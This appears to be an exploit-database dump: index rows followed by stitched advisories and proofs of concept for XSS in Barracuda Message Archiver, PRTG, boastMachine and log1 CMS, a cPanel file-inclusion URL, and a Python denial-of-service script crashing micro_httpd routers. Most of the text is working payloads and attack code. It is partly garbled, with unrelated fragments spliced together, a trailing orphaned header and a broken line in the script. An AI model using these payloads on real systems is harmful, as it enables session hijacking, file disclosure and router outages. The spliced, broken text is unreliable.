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34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0
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34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge SA",php,webapps,0
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34100,platforms/php/webapps/34100.txt,"Omeka 2.2 - CSRF And Stored XSS Vulnerability",2014-07-17,LiquidWorm,php,webapps,80
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34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80
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34103,platforms/cgi/webapps/34103.txt,"Barracuda Networks Message Archiver 650 - Persistent XSS Vulnerability",2014-07-18,Vulnerability-Lab,cgi,webapps,3378
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34106,platforms/php/webapps/34106.txt,"cPanel 11.25 Image Manager 'target' Parameter Local File Include Vulnerability",2010-06-07,"AnTi SeCuRe",php,webapps,0
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34107,platforms/php/webapps/34107.txt,"boastMachine 3.1 'key' Parameter Cross Site Scripting Vulnerability",2010-06-07,"High-Tech Bridge SA",php,webapps,0
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34108,platforms/java/webapps/34108.txt,"PRTG Traffic Grapher 6.2.1 'url' Parameter Cross Site Scripting Vulnerability",2009-01-08,"Patrick Webster",java,webapps,0
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34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Include Vulnerabilities",2010-06-03,"High-Tech Bridge SA",php,webapps,0
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Document Title:
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===============
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Barracuda Networks Message Archiver 650 - Persistent Input Validation Vulnerability
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References (Source):
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====================
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http://www.vulnerability-lab.com/get_content.php?id=751
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https://www.barracuda.com/support/knowledgebase/501600000013lXe
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Barracuda Networks Security ID (BNSEC): 703
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BNSEC-00703: Remote authenticated persistent XSS in Barracuda Message Archiver v3.2
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Solution #00006604
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Release Date:
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=============
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2014-07-18
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Vulnerability Laboratory ID (VL-ID):
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====================================
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751
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Common Vulnerability Scoring System:
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====================================
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3.6
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Product & Service Introduction:
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===============================
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The Barracuda Message Archiver is a complete and affordable email archiving solution, enabling you to effectively
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index and preserve all emails, enhance operational efficiencies and enforce policies for regulatory compliance. By
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leveraging standard policies and seamless access to messages, email content is fully indexed and backed up to enable
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administrators, auditors and end users quick retrieval of any email message stored in an organization’s email archive.
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* Comprehensive archiving
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* Exchange stubbing
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* Search and retrieval
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* Policy management
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* Intelligent Storage Manager
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* Roles-based interface
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* Reporting and statistics
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The Barracuda Message Archiver provides everything an organization needs to comply with government regulations in an
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easy to install and administer plug-and-play hardware solution. The Barracuda Message Archiver stores and indexes all
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email for easy search and retrieval by both regular users and third-party auditors. Backed by Energize Updates, delivered
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by Barracuda Central, the Barracuda Message Archiver receives automatic updates to its extensive library of virus, policy
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definitions to enable enhanced monitoring of compliance and corporate guidelines, document file format updates needed to
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decode content within email attachments, as well as security updates for the underlying Barracuda Message Archiver platform
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to protect against any potential security vulnerabilities.
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(Copy of the Vendor Homepage: http://www.barracudanetworks.com )
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Abstract Advisory Information:
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==============================
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The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in Barracudas Messsage Archiver 3.2 Appliance Application.
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Vulnerability Disclosure Timeline:
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==================================
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2013-11-08: Researcher Notification & Coordination (Benjamin Kunz Mejri)
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2013-11-10: Vendor Notification (Barracuda Networks - Bug Bounty Program)
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2013-11-13: Vendor Response/Feedback (Barracuda Networks - Bug Bounty Program)
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2014-06-31: Vendor Fix/Patch (Barracuda Networks Developer Team - Reward: $$$)
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2014-00-00: Public Disclosure (Vulnerability Laboratory)
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Discovery Status:
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=================
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Published
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Affected Product(s):
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====================
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Barracuda Networks
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Product: Message Archiver 650 - Appliance Application 3.1.0.914
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Exploitation Technique:
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=======================
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Remote
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Severity Level:
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===============
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Medium
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Technical Details & Description:
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================================
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A persistent input validation web vulnerability has been discovered in the official Barracuda Networks Message Archiver 650 v3.2 appliance web-application.
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The remote vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable application module.
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The vulnerability is located in the `Benutzer > Neu Anlegen > Rolle: Auditor > Domänen` module. Remote attackers are able to inject own malicious script
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codes in the vulnerable domain_list_table-r0 values. The execution of the script code occurs in the domain_list_table-r0 and user_domain_admin:1 appliance
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application response context. The request method is POST and the attack vector is persistent on the application-side of the barracuda networks message
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archiver web appliance.
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The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6.
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Exploitation of the vulnerability requires a low privileged or restricted application user account with low or medium user interaction. Successful exploitation
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of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation of module context.
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Request Method(s):
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[+] POST
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Vulnerable Module(s):
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[+] Benutzer > Neu Anlegen > Rolle: Auditor
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Vulnerable Input(s):
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[+] Domänen
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Vulnerable Parameter(s):
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[+] domain_list_table-r0
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Affected Module(s):
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[+] Rolle: Auditor Listing
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Proof of Concept (PoC):
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=======================
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The persistent web vulnerability can be exploited by remote attackers with low privileged or restricted application user account and low required user inter action.
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For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.
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--- PoC Session Logs [POST] ---
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ajax_bc_sub=addDomain
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domain=%22%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20onload%3Dalert(document.cookie)%20%3C%20%20%22%3E%3Ciframe%20src
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%3Dhttp%3A%2F%2Fvuln-lab.com%20onload%3Dalert(document.cookie)%20%3C
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user=guest
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password=75361da9533223d9685576d10bd6aa02
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et=
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1352520628
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locale=de_DE
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realm=
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auth_type=Local
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primary_tab=USERS
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secondary_tab=per_user_add_update
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PoC (URL):
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http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&et=1352520461&locale=de_DE&password=4b0a7f3a136e60c7cf73ec1b30ec6a23&
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primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM
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PoC: Benutzer > Neu Anlegen > Rolle: Auditor > Domänen > (domain_list_table-r0)
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<td style="vertical-align:middle;text-align:left;white-space:nowrap">
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%20?????">?????<iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <=""
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"="[PERSISTENT INJECTED SCRIPT CODE!]< </iframe><input name="user_domain_admin:1"
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id="user_domain_admin:1" value=""[PERSISTENT INJECTED SCRIPT CODE!]" type="hidden"></td>
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Reference(s):
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http://archiver.ptest.localhost:3378/cgi-mod/index.cgi
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http://archiver.ptest.localhost:3378/cgi-mod/index.cgi?auth_type=Local&et=1352520461&locale=de_DE&password=4b0a7f3a136e60c7cf73ec1b30ec6a23&
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primary_tab=USERS&realm=&secondary_tab=per_user_add_update&user=benjaminKM_0ne
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Solution - Fix & Patch:
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=======================
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The vulnerability can be patched by a secure parse and encode of the vulnerable affected listing in the domain_list_table-r0 parameter(s).
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Barracuda Networks Appliance: Advanced >Firmware Updates Page
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https://www.barracuda.com/support/knowledgebase/501600000013lXe
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Security Risk:
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==============
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The security risk of the application-side input validation web vulnerability is estimated as medium.
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Credits & Authors:
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==================
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Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
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Disclaimer & Information:
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=========================
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The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
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expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
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are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
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if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
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of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
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any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
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VULNERABILITY LABORATORY RESEARCH TEAM
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DOMAIN: www.vulnerability-lab.com
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PRTG Traffic Grapher is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
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An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
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Versions prior to PRTG Traffic Grapher 6.2.1.963/964 are vulnerable.
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http://example.com:8080/login.htm?url="><script>alert(document.cookie)</script>
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# Exploit Title: Buffer Overflow in micro_httpd by ACME
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# Date: 4/7/2014
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# Exploit Author: Yuval tisf Nativ
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# Vendor Homepage: http://www.acme.com/software/micro_httpd/
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# Software Link: http://www.acme.com/software/micro_httpd/
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# Version: June 2012
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# CVE: CVE-2014-4927
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# Tested on: D-Link: (DSL2750U, DSL2740U), NetGear: (WGR614, MR-ADSL-DG834)
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Buffer Overflow in micro_httpd
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Argument for GET method is vulnerable to a buffer overflow.
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Analyzed on:
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D-Link: DSL2750U, DSL2740U,
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NetGear: WGR614, MR-ADSL-DG834
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ACME Labs offer no version tracking on server versions so version might not
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Disassmebly in MIPS of vulnerable flow:
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sub_4067CC:
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LOAD:004067CC
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LOAD:004067CC lui $gp, 0x47
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LOAD:004067D0 addiu $sp, -0xA0
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LOAD:004067D4 li $gp, 0x46B850
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LOAD:004067D8 sw $ra, 0xA0+var_4($sp)
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LOAD:004067DC sw $s3, 0xA0+var_8($sp)
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LOAD:004067E0 sw $s2, 0xA0+var_C($sp)
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LOAD:004067E4 sw $s1, 0xA0+var_10($sp)
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LOAD:004067E8 sw $s0, 0xA0+var_14($sp)
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LOAD:004067EC sw $gp, 0xA0+var_88($sp)
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LOAD:004067F0 lui $s0, 0x46
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LOAD:004067F4 lw $v1, dword_464108
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LOAD:004067F8 lw $t9, (off_463B24 - 0x46B850)($gp)
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LOAD:004067FC move $v0, $a0
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LOAD:00406800 sw $a1, 0xA0+var_90($sp)
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LOAD:00406804 move $s2, $a2
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LOAD:00406808 lui $a1, 0x44
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LOAD:0040680C lui $a2, 0x44
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LOAD:00406810 move $a0, $v1
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LOAD:00406814 la $a1, aSDS # "%s %d %s\r\n"
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LOAD:00406818 la $a2, aHttp1_1 # "HTTP/1.1"
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LOAD:0040681C move $s1, $a3
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LOAD:00406820 jalr $t9
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LOAD:00406824 move $a3, $v0
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LOAD:00406828 lw $gp, 0xA0+var_88($sp)
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LOAD:0040682C lw $a0, dword_464108
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LOAD:00406830 lw $t9, (off_463B24 - 0x46B850)($gp)
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LOAD:00406834 lui $a2, 0x44
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LOAD:00406838 lui $a1, 0x44
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LOAD:0040683C la $a2, aMicro_httpd # "micro_httpd"
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LOAD:00406840 jalr $t9
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LOAD:00406844 la $a1, aServerS # "Server: %s\r\n"
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LOAD:00406848 lw $gp, 0xA0+var_88($sp)
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LOAD:0040684C lw $a1, 0x4108($s0)
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LOAD:00406850 lw $t9, (off_463BCC - 0x46B850)($gp)
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LOAD:00406854 lui $a0, 0x44
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LOAD:00406858 jalr $t9
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LOAD:0040685C la $a0, aCacheControlNo # "Cache-Control:
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no-cache\r\n"
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LOAD:00406860 lw $gp, 0xA0+var_88($sp)
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LOAD:00406864 move $a0, $0
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LOAD:00406868 lw $t9, (off_463CDC - 0x46B850)($gp)
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LOAD:0040686C jalr $t9
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LOAD:00406870 addiu $s3, $sp, 0xA0+var_7C
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LOAD:00406874 lw $gp, 0xA0+var_88($sp)
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LOAD:00406878 addiu $a0, $sp, 0xA0+var_80
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LOAD:0040687C lw $t9, (off_463DF4 - 0x46B850)($gp)
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LOAD:00406880 jalr $t9
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LOAD:00406884 sw $v0, 0xA0+var_80($sp)
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LOAD:0040688C lui $a2, 0x44
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Working Exploit for a Denial of Service:
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"""
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#!/bin/python
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import socket
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import struct
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# This will crash the router.
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# In some devices it takes about 10 minutes until functionality is
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restored.
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buffer = "\x41" * 6000 # Original fuzzing buffer.
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host = "10.0.0.138"
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s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
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s.connect((host, 80))
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payload = GET /" + buffer + " HTTP/1.1\r\n"
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s.send(payload)
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An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process, which may aid in further attacks.
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http://www.example.com/frontend/x3/cpanelpro/doconvert.html?target=/etc/
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boastMachine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
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An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
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boastMachine 3.1 is vulnerable; other versions may be affected.
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http://www.example.com/?action=search&title=item&blog=1&key=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
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log1 CMS is prone to a security-bypass vulnerability because of a design flaw and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
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An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
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log1 CMS 2.0 is vulnerable; other versions may be affected.
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<form action="http://example.com/admin/main.php?action=savefile" method="post" name="main" > <input name="content" type="hidden" value='Some text here..."><script>alert(document.cookie)</script>' /> <input type="hidden" name="filename" value="menupage1_page" /> </form> <script> document.main.submit(); </script>
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Date: 23.06.2014
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Exploit Author: Drozdova Liudmila, ITDefensor Vulnerability Research Team (http://itdefensor.ru/)
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Vendor Homepage: http://www.microsoft.com/
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Tested on: Window 7 SP1 x86 IE 8,9,10
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Tested on: Window 7 SP1 x86 IE 7,8,9,10
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CVE : unknown
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